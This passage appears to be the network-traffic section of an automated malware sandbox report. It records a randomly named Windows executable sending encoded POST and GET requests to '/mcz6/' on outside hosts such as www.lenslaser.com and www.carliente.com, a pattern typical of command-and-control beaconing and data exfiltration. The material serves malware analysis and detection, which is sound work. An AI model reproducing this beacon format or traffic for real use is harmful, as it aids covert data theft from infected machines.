                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 49 34 36 64 48 73 54 66 37 2b 34 6d 30 59 68 50 4d 30 63 6e 46 57 76 30 35 51 32 39 4f 76 79 46 75 31 50 5a 4a 68 61 4e 33 36 69 2b 59 66 4e 56 69 53 2b 30 4f 50 36 65 43 63 53 70 4a 49 31 4e 39 34 56 2b 67 57 58 6c 4a 55 65 76 75 6d 2f 79 38 36 46 76 72 66 52 72 61 30 39 53 4b 5a 30 52 6c 6e 38 36 41 57 34 2b 50 2b 45 6a 42 77 37 44 68 46 47 6a 63 78 4a 52 6e 61 49 6c 55 4a 6e 71 47 32 73 51 57 65 44 45 6d 50 4e 2b 4c 4b 4d 4b 4e 70 43 63 55 4e 32 62 37 57 67 61 47 74 48 68 66 45 68 58 45 43 52 37 77 3d 3d
                                                    Data Ascii: 1Joh=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmI46dHsTf7+4m0YhPM0cnFWv05Q29OvyFu1PZJhaN36i+YfNViS+0OP6eCcSpJI1N94V+gWXlJUevum/y86FvrfRra09SKZ0Rln86AW4+P+EjBw7DhFGjcxJRnaIlUJnqG2sQWeDEmPN+LKMKNpCcUN2b7WgaGtHhfEhXECR7w==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.949725162.241.216.140801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:39.655404091 CEST1769OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.lenslaser.com
                                                    Referer: http://www.lenslaser.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 4a 41 36 63 31 49 54 65 63 69 34 6e 30 59 68 52 38 30 64 6e 46 58 2f 30 35 49 79 39 4f 6a 39 46 73 4e 50 62 71 70 61 4c 44 6d 69 33 59 66 4e 4e 53 54 35 70 2b 50 4b 65 43 4d 57 70 4a 59 31 4e 39 34 56 2b 6d 53 58 73 34 55 65 74 75 6d 38 31 38 36 4a 72 72 66 31 72 61 38 74 53 4b 4d 42 57 57 2f 38 30 41 47 34 38 39 6d 45 38 78 77 35 4f 42 45 44 6a 63 39 57 52 6e 47 71 6c 56 73 49 71 46 57 73 64 42 32 66 52 6d 57 57 36 4b 79 39 4c 4e 4a 55 59 77 73 56 56 35 76 30 44 6d 31 69 30 74 70 78 55 6c 58 6e 6a 71 42 72 4d 38 44 53 67 48 5a 36 77 39 63 39 44 4d 50 72 41 2b 54 4d 30 66 42 57 79 33 76 46 6f 4b 6e 49 38 73 6d 45 36 35 64 72 74 6e 38 2b 49 70 61 38 7a 54 4a 41 75 52 4a 2f 58 7a 32 54 75 49 2b 42 58 39 62 55 4f 31 59 32 43 57 4a 63 33 69 75 58 61 62 2f 79 4e 67 4a 4e 4a 68 47 45 7a 70 77 4f 34 48 34 36 75 49 36 4b 2f 46 5a 57 66 31 32 64 56 76 6a 52 38 4b 66 57 47 [TRUNCATED]
                                                    Data Ascii: 1Joh=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmJA6c1ITeci4n0YhR80dnFX/05Iy9Oj9FsNPbqpaLDmi3YfNNST5p+PKeCMWpJY1N94V+mSXs4Uetum8186Jrrf1ra8tSKMBWW/80AG489mE8xw5OBEDjc9WRnGqlVsIqFWsdB2fRmWW6Ky9LNJUYwsVV5v0Dm1i0tpxUlXnjqBrM8DSgHZ6w9c9DMPrA+TM0fBWy3vFoKnI8smE65drtn8+Ipa8zTJAuRJ/Xz2TuI+BX9bUO1Y2CWJc3iuXab/yNgJNJhGEzpwO4H46uI6K/FZWf12dVvjR8KfWGZwKhWKoLiYdiJJUWfeuwhliItm7XCm0rEjbmLxOHpdhHGkDELDS0mXIoY/38wk20LqS6Yje5MyB7ca8xGmqUPhBiKw4KCeMViMab1EkrXdYg1Gp/suuIzCcQWEkYZwwjPHnDn35JwtWaRTvGawdTuTNxJ3eKCe3lsoAqjpyDA0B9pM5PiKRkuHb2TH3dEt37BAKamLMrafIylBNGas7N76hWvSRH+iY3VR1L7Z3oHSY5yP+eX3pV3p16x2FLjITm4/cqpLII05OkHbVHQBQfmwMv7sU86zNLwzgLfgxZWROAXd+ZCmpv/UGZE3sqn/G8+3TVh/l35aYlBVZQawv75H5m4RkvZ+12DcoUrV58b1dVzkhStZOlt2lAZxCVADf70j9iU/YTubAGybD/AkQh3kyUy8jX6Qd12xkBykrCZWW2PjQ8erE0Si7LODg2VDk9MNGC+cvHlIOyttbB05i7aoLd1gMAjg1Om7AIjRE/FKE+Zb+eS/zTJIvk20WUSErNBonD3d7l4ln97iq7eQzl4Q3XLhT6GZUB7gUpgcgef5w0Ywhp5ptpwsHI32HUb0HNaoB4NCvGMlSlNxT/izKK//uMBI6awXl0yhqa59W9jYkl7tJ7seoS42WIaa71K1R3bMglJnmTIK2lT6nIRZs6rteo5RbRg6E2XI [TRUNCATED]
                                                    May 16, 2024 17:19:40.897634983 CEST479INHTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:19:40 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.949726162.241.216.140801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:42.203634977 CEST473OUTGET /mcz6/?1Joh=jpQBXhuFRU/tY42PEy1MRCLekuE2gkbQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREibl9IXZIQ7kou/2QQYtq6MxCehvw2Hq6A==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                                                    Host: www.lenslaser.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    May 16, 2024 17:19:43.052234888 CEST479INHTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:19:42 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.949727217.160.0.111801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:48.469305038 CEST732OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.carliente.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.carliente.com
                                                    Referer: http://www.carliente.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4e 62 45 38 56 56 65 51 73 41 70 76 48 6c 35 75 76 6e 39 64 69 5a 78 70 34 6e 66 30 50 48 37 5a 52 65 56 68 59 79 79 61 43 32 62 52 38 4b 2f 4d 5a 64 49 39 47 77 59 6a 43 6f 30 77 38 32 45 72 6c 55 48 65 4e 4c 7a 50 58 47 30 36 48 66 39 72 66 79 6d 46 62 34 32 61 69 6e 62 57 56 61 76 45 4d 71 32 72 4d 47 31 70 70 42 64 30 37 51 49 43 50 4f 63 62 63 75 75 42 6c 7a 71 67 71 6c 39 72 71 70 34 45 70 36 30 45 6c 67 52 37 71 37 30 4e 43 58 76 4c 67 70 76 36 71 6a 71 51 37 39 2f 43 52 38 46 34 57 51 63 51 77 6f 6b 66 31 37 62 59
                                                    Data Ascii: 1Joh=g0NNOeEZLnaHNbE8VVeQsApvHl5uvn9diZxp4nf0PH7ZReVhYyyaC2bR8K/MZdI9GwYjCo0w82ErlUHeNLzPXG06Hf9rfymFb42ainbWVavEMq2rMG1ppBd07QICPOcbcuuBlzqgql9rqp4Ep60ElgR7q70NCXvLgpv6qjqQ79/CR8F4WQcQwokf17bY
                                                    May 16, 2024 17:19:49.188283920 CEST1236INHTTP/1.1 200 OK
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Thu, 16 May 2024 15:19:49 GMT
                                                    Server: Apache
                                                    Content-Encoding: gzip
                                                    Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                    Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                    May 16, 2024 17:19:49.194152117 CEST212INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                    Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7
                                                    May 16, 2024 17:19:49.203298092 CEST687INData Raw: 92 8e a8 10 87 09 4a 51 64 f7 ad 2b 45 b4 49 c9 9b f1 15 d6 3f 7f 32 07 08 80 9d d0 9b 2e fb c7 1c f8 51 e0 ae 22 e0 78 aa 93 f0 90 ce d7 58 13 5b 19 d2 de b0 fa e1 fa 69 ef 6f ea 6b ce 16 63 81 1f 3a bc 81 1e 9a be c7 d7 e3 16 d0 f5 99 af e2 38
                                                    Data Ascii: JQd+EI?2.Q"xX[iokc:8WeDZ4(:V41J}D#nu:Z3;6`9aKf.U[n6F5glJSsTEcfK|i(eOx.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.949728217.160.0.111801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:51.432033062 CEST756OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.carliente.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.carliente.com
                                                    Referer: http://www.carliente.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4c 34 63 38 57 32 47 51 39 77 70 75 49 46 35 75 6c 48 39 5a 69 5a 4e 70 34 6d 62 6b 50 31 76 5a 52 37 70 68 5a 33 53 61 46 32 62 52 7a 71 2f 46 58 39 49 4d 47 77 56 65 43 71 77 77 38 32 51 72 6c 55 33 65 4e 39 37 49 56 57 30 34 50 2f 39 31 53 53 6d 46 62 34 32 61 69 6a 37 38 56 5a 66 45 4e 61 47 72 4e 6c 74 32 6c 68 64 37 79 77 49 43 65 65 63 66 63 75 76 78 6c 79 47 61 71 67 35 72 71 6f 49 45 6f 6f 51 44 75 67 52 48 6c 62 31 74 4f 43 53 39 72 71 53 6d 33 51 4f 45 75 73 7a 48 66 39 6c 6d 48 69 56 4c 6c 2f 6b 34 79 63 53 77 46 6c 34 74 31 6e 71 43 34 42 77 57 32 76 4f 4a 7a 47 45 56 70 67 3d 3d
                                                    Data Ascii: 1Joh=g0NNOeEZLnaHL4c8W2GQ9wpuIF5ulH9ZiZNp4mbkP1vZR7phZ3SaF2bRzq/FX9IMGwVeCqww82QrlU3eN97IVW04P/91SSmFb42aij78VZfENaGrNlt2lhd7ywICeecfcuvxlyGaqg5rqoIEooQDugRHlb1tOCS9rqSm3QOEuszHf9lmHiVLl/k4ycSwFl4t1nqC4BwW2vOJzGEVpg==
                                                    May 16, 2024 17:19:52.113498926 CEST1236INHTTP/1.1 200 OK
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Thu, 16 May 2024 15:19:51 GMT
                                                    Server: Apache
                                                    Content-Encoding: gzip
                                                    Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                    Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                    May 16, 2024 17:19:52.118772984 CEST212INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                    Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7
                                                    May 16, 2024 17:19:52.132638931 CEST687INData Raw: 92 8e a8 10 87 09 4a 51 64 f7 ad 2b 45 b4 49 c9 9b f1 15 d6 3f 7f 32 07 08 80 9d d0 9b 2e fb c7 1c f8 51 e0 ae 22 e0 78 aa 93 f0 90 ce d7 58 13 5b 19 d2 de b0 fa e1 fa 69 ef 6f ea 6b ce 16 63 81 1f 3a bc 81 1e 9a be c7 d7 e3 16 d0 f5 99 af e2 38
                                                    Data Ascii: JQd+EI?2.Q"xX[iokc:8WeDZ4(:V41J}D#nu:Z3;6`9aKf.U[n6F5glJSsTEcfK|i(eOx.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.949729217.160.0.111801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:53.965930939 CEST1769OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.carliente.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.carliente.com
                                                    Referer: http://www.carliente.com/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4c 34 63 38 57 32 47 51 39 77 70 75 49 46 35 75 6c 48 39 5a 69 5a 4e 70 34 6d 62 6b 50 31 33 5a 52 4a 78 68 62 57 53 61 45 32 62 52 74 36 2f 49 58 39 49 72 47 77 4d 5a 43 71 38 47 38 30 6f 72 6e 31 58 65 61 34 62 49 66 57 30 34 44 66 39 6f 66 79 6d 71 62 37 65 65 69 6e 58 38 56 5a 66 45 4e 59 65 72 4b 32 31 32 6e 68 64 30 37 51 49 4f 50 4f 63 37 63 75 32 4a 6c 79 7a 74 72 54 78 72 71 49 59 45 71 61 49 44 6e 67 52 2f 78 37 31 50 4f 43 57 75 72 75 7a 66 33 52 36 75 75 74 48 48 64 4b 6f 72 65 53 4a 50 33 4e 45 52 30 39 36 59 41 67 41 50 38 46 50 66 73 67 55 52 70 61 36 59 77 30 4a 4e 72 61 34 52 76 6c 38 63 2f 2b 2b 58 50 37 67 4a 68 55 31 58 2f 42 63 6f 2f 49 4f 55 64 76 35 50 56 68 2f 49 57 31 37 4f 75 46 76 49 6b 47 63 68 47 68 67 57 43 34 5a 73 65 50 37 52 31 2b 31 44 32 31 32 38 53 70 42 6d 2f 67 58 56 57 55 39 2b 75 32 72 75 57 4c 31 34 39 7a 6b 51 2b 56 59 4e 68 5a 44 4d 79 4e 49 52 6a 49 42 6c 51 4e 6d 4f 57 2f 46 43 78 56 75 48 69 50 46 47 4b [TRUNCATED]
                                                    Data Ascii: 1Joh=g0NNOeEZLnaHL4c8W2GQ9wpuIF5ulH9ZiZNp4mbkP13ZRJxhbWSaE2bRt6/IX9IrGwMZCq8G80orn1Xea4bIfW04Df9ofymqb7eeinX8VZfENYerK212nhd07QIOPOc7cu2JlyztrTxrqIYEqaIDngR/x71POCWuruzf3R6uutHHdKoreSJP3NER096YAgAP8FPfsgURpa6Yw0JNra4Rvl8c/++XP7gJhU1X/Bco/IOUdv5PVh/IW17OuFvIkGchGhgWC4ZseP7R1+1D2128SpBm/gXVWU9+u2ruWL149zkQ+VYNhZDMyNIRjIBlQNmOW/FCxVuHiPFGK3m/B9Uo66TCsnvYhfvu5PFu1yUTaIL4EUX8du18fKoWNaPPVe/4V6rj20VQh147qAh3oFqD1sBIRMS6qyR2Q9catMxrRYcKaDLvI2ujCATPh8NxcGQ+Dzmb4+mg29qVkmoEatW7b0GCJAp9rORtQVFIe6U6dL9ldhw6rroN0V56A1vhkMtpCyeYdLhN9xPNRepS4VuCsQ1GZEHpuJgXfjQ0+VbhGWMPMQhsncz7BSDKnnKozeayClX3vUo6Sp86dp4leBbdO2/Yq19HRgIt5KDaaHjOStyNmy1d7LP+jbgSSprZIAyKw0109qNB5cJ5OEcxTrRIc0BtXHG7UzFJq1IYBfY68SCnvo58Ey4Fbi7n+o7fAzwQ8OQj2as/rIn2CZYFjQkgIhF+08Rr70qzc3X0u1GjxXCH+/Fnbeuj3z0ctIn/IFiwDWojSuXaGfnbSftvShA3IxAxM+UxQ4wWmNiZACRNdlcqXS6QmemFb1wWRaIWDA7zV73cUo1V9UmbXRc9iBzlT/IpH7IByU80AoP9pgQ1RiVj4aJFDe6cqTbwrEeuiiqo49EW4+NJ20NrBCWK3xO7hj9O6J5Zdspf1Nm3eDb17QWyGZfeQyWPent1Pyt9dvqd9mLraC6YxH1JCvT9/+O9b2xy/eTcpIy7fSbrFiw96C/rWr/ [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.949730217.160.0.111801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:19:56.497937918 CEST473OUTGET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=t2ltNu02BWCxFJkDVXGm6lgSI2VyyVBo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33fhcSA/1GWguFcrikpDXwe5bKKbqlQA== HTTP/1.1
                                                    Host: www.carliente.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    May 16, 2024 17:19:57.187951088 CEST1236INHTTP/1.1 200 OK
                                                    Content-Type: text/html
                                                    Content-Length: 4545
                                                    Connection: close
